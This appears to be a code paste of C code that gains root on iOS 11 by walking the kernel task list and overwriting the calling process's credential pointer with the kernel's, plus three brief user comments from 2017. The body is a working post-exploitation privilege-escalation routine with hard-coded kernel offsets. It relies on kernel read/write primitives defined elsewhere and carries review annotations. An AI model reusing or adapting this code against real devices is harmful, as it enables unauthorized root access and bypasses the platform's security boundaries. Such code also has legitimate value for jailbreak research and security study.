get uid: 0 - iOS 11
// gets uid 0 (iOS 11)
// add patchfinder and you should be good
// Abraham Masri @cheesecakeufo
/*
* Purpose: iterates over the procs and finds our proc
*/
/*
 * Walks the kernel task list starting from the caller's own task port and
 * returns the kernel address of the proc (bsd_info) whose pid equals getpid().
 *
 * Returns: the proc address, or (uint64_t)-1 (== UINT64_MAX) when the walk
 * reaches a 0 task pointer without finding a match. Callers must compare
 * against -1 (converted the same way), not against 0.
 *
 * rk64/rk32/koffset/task_self_addr are declared elsewhere; every read is an
 * unchecked kernel-memory read with build-specific offsets. bsd_info is not
 * checked for 0 before it is dereferenced via rk32, and a malformed or
 * unterminated list is only stopped by rk64 eventually returning 0.
 */
uint64_t get_our_proc() {
uint64_t task_self = task_self_addr();
// ip_kobject of our task port; treated as the task struct (offset name only, not verified here)
uint64_t struct_task = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
while (struct_task != 0) {
uint64_t bsd_info = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
// get the process pid
uint32_t pid = rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID));
if(pid == getpid()) {
return bsd_info;
}
// follow the TASK_PREV link (presumably the backward link of the task list)
struct_task = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_PREV));
}
return -1; // we failed :/
}
/*
 * Overwrites the calling process's credential pointer (p_ucred) with the
 * kernel task's credential pointer, then calls setuid(0) and prints getuid().
 *
 * Returns: KERN_FAILURE when get_our_proc() cannot locate the caller's proc,
 * otherwise KERN_SUCCESS. No other failure is detected: kread_uint64,
 * kread_uint32, kwrite_uint64 and kernel_task are declared elsewhere and
 * their results are taken at face value.
 *
 * Review notes:
 *  - 0x100 (p_ucred) and 0x2a8 (p_csflags) are hard-coded for one kernel
 *    build, unlike get_our_proc() which goes through koffset(); they will be
 *    silently wrong on any other build.
 *  - csflags and our_cred are read but never used.
 *  - open() is neither checked nor closed; the descriptor leaks.
 *  - "%llx" is used for uint64_t; PRIx64 from <inttypes.h> is the portable form.
 */
kern_return_t get_root () {
kern_return_t ret = KERN_SUCCESS;
uint64_t our_proc = get_our_proc();
// get_our_proc() returns (uint64_t)-1 on failure; -1 here converts to the same value
if(our_proc == -1) {
printf("[ERROR]: no our proc. wut\n");
ret = KERN_FAILURE;
return ret;
}
extern uint64_t kernel_task;
printf("[INFO]: kernel_task: %llx\n", kernel_task); // BSD_INFO
// the kernel proc's credential pointer
uint64_t kern_ucred = kread_uint64(kernel_task + 0x100 /* KSTRUCT_OFFSET_PROC_UCRED */);
printf("[INFO]: kern_ucred: %llx\n", kern_ucred);
uint64_t offsetof_p_csflags = 0x2a8;
uint32_t csflags = kread_uint32(our_proc + offsetof_p_csflags); // read but unused
uint64_t our_cred = kread_uint64(our_proc + 0x100 /* KSTRUCT_OFFSET_PROC_UCRED */); // read but unused
// the privilege change: our p_ucred now aliases the kernel's credential
kwrite_uint64(our_proc + 0x100 /* KSTRUCT_OFFSET_PROC_UCRED */, kern_ucred);
printf("[INFO]: successfully wrote our kern_ucred into our cred!\n");
setuid(0);
printf("[INFO]: getuid: %d\n", getuid());
int fd = open("/var/mobile/xxx", O_WRONLY); // return value unchecked, fd never closed
// you'll probably panic few seconds after this thanks to the new sandbox protections
return ret;
}
MODZ4FUN420 Dec 12, 2017

Will this be made into an API?
simsdj Dec 13, 2017

What even is this
arinc9 Dec 13, 2017

Stop lowering the IQ of this place.